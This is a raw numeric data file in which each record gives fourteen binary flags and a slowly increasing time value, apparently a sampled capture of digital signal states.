1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2615480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2615720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2615960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2616240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2616480e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2616760e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2617240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2617480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2617560e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2617720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2617960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2618240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2618480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2618760e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2619000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2619240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2619480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2619720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2619960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2620240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2620480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2620760e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2621000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2621240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2621480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2621720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2621960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2622240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2622480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2622760e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2623000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2623240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2623480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2623720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2623960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2624240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2624480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2624760e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2625000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2625240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2625480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2625720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2625960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.3869560e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,7.3871320e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.3871560e-03 0,0,0,1,0,0,0,0,0,0,0,1,0,1,7.3871800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.3872120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,7.3875280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.3875560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,7.3875800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.3876040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,7.3876280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.3876520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,7.3876760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.3877040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,7.3877280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,1,7.3877560e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3877880e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3878040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3878280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3878360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3878520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3878760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3879320e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3879560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3879800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3880040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3880280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3880520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3880760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3881040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3881280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3881560e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3882040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3882280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3882360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3882520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3882760e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3882840e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3883320e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3883560e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,7.3883600e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3883640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3883800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3884040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3884280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3884520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3884760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3885040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3885280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3885560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3886040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3886280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3886520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3886760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3887320e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3887560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3887800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3888040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3888280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3888520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3888760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3889040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3889280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3889560e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3890040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3890280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3890360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3890520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3890760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3891040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3891280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3891560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3891800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3892040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3892280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3892520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3892760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3893040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3893280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3893560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3893800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3894040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3894280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3894520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3894760e-03 0,0,0,1,0,0,0,0,0,1,0,0,0,0,7.3894800e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3894840e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3895320e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3895560e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,7.3895600e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3895640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3895800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3896040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3896280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3896520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3896760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3897040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3897080e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3897560e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3897800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3897880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3898040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3898280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3898360e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3898520e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3898760e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3899040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3899280e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3899560e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3899800e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3900040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3900280e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3900800e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3901040e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3901280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3901560e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,7.3901600e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3901640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3901800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3902040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3902520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3902800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3903040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3903280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3903560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3903800e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3903840e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3904040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3904280e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3904520e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3904760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3904840e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3905320e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3905560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3905800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3906040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3906280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3906520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3906760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3907040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3907280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3907560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3907800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3908040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3908280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3908520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3908760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3909040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3909280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3909560e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3910040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3910280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3910360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3910800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3911040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3911280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3911560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3911800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3912040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3912280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3912520e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3912600e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3913040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3913320e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3913360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3913560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3913800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3914040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3914280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3914520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3914760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3915040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3915280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3915320e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3915800e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3916040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3916120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3916280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3916520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3916760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3917040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3917280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3917560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3917800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3918040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3918280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3918520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3918760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3919000e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3919080e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3919520e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3919760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3919840e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3920040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3920280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3920520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3920760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3921000e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3921240e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3921320e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3921800e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3922040e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,7.3922080e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3922120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3922280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3922520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3922760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3923000e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3923240e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3923520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3923760e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3924040e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3924520e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3924760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3924840e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3925000e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3925240e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3925320e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3925760e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3926040e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,7.3926080e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3926120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3926280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3926520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3926760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3927040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3927080e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3927280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3927560e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,7.3927600e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3927640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3928040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3928280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3928520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3928760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3929040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3929280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3929800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3930040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3930280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3930520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3930760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3931040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3931280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3931560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3931800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3932040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3932080e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3932520e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3932800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3932840e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3933040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3933280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3933320e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3933800e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3934040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3934120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3934280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3934520e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3934760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3935040e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3935280e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3935560e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3935800e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3936040e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3936080e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,7.3936520e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3936760e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3936840e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3937040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3937280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3937560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3937800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3938040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3938280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3938520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3938760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3939040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3939280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3939560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3939800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3940040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3940280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3940520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3940760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3941040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3941280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3941560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3941800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3942040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3942280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3942520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3942760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3943040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3943280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3943560e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3943800e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3944040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3944280e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3944520e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3944760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,7.3945040e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,7.3945280e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,7.3945320e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,1,7.5188600e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,1,7.5190880e-03 1,0,0,1,0,1,0,0,0,1,0,1,0,1,7.5191160e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,1,7.5191440e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,1,7.5194360e-03 1,0,0,1,0,1,0,0,0,0,0,0,1,1,7.5194680e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,1,7.5194720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,7.5194760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,1,7.5195240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,7.5195480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,1,7.5195960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,7.5196200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,1,7.5196720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5196920e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5196960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5197480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5197720e-03 1,0,0,1,0,0,0,0,0,1,0,0,0,0,7.5197760e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5197800e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5197960e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5198200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5198280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5198440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5198720e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5198760e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5198960e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5199240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5199280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5199720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5199960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5200480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5200720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5201240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5201480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5201960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5202200e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5202280e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5202440e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5202720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5202760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5202960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5203200e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5203240e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5203440e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5203680e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5203760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5204200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5204440e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5204920e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5205200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5205720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5205960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5206440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5206680e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5206760e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5206920e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5207200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5207240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5207440e-03 